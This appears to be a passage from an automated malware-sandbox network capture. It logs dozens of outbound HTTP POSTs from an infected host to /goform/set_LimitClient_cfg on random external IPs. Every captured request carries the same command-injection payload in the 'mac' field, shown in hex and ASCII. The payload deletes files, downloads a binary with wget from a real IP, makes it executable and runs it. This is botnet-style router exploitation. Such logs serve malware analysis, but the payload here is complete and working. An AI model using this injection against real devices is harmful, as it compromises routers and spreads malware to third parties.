                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2167192.168.2.2358854180.88.114.1708080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432765007 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2168192.168.2.2339454221.255.133.648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432836056 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2169192.168.2.233855217.204.156.1458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432858944 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2170192.168.2.2354342123.38.168.2368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.432905912 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2171192.168.2.234159213.18.242.318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.433847904 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2172192.168.2.233743296.157.46.448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.433952093 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2173192.168.2.2350816156.61.32.1648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434107065 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2174192.168.2.2352942122.167.30.58080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434195995 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2175192.168.2.2347340130.125.32.2528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434283018 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2176192.168.2.2343950204.83.161.818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434288979 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2177192.168.2.2345262198.97.47.1298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434289932 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2178192.168.2.2349060219.110.172.608080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434299946 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2179192.168.2.2359890179.21.140.898080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434333086 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2180192.168.2.2343914126.186.70.2458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434544086 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2181192.168.2.233478278.15.78.598080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434554100 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2182192.168.2.2344882124.147.196.588080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434608936 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2183192.168.2.2338178114.22.98.2478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434694052 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2184192.168.2.2338120207.167.84.898080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434734106 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2185192.168.2.2360192143.180.58.1638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434797049 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2186192.168.2.234852488.177.51.1788080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434849977 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2187192.168.2.2353596104.141.57.78080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434870958 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2188192.168.2.233930284.232.116.738080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.434911013 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2189192.168.2.23440185.12.212.1948080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.436177015 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
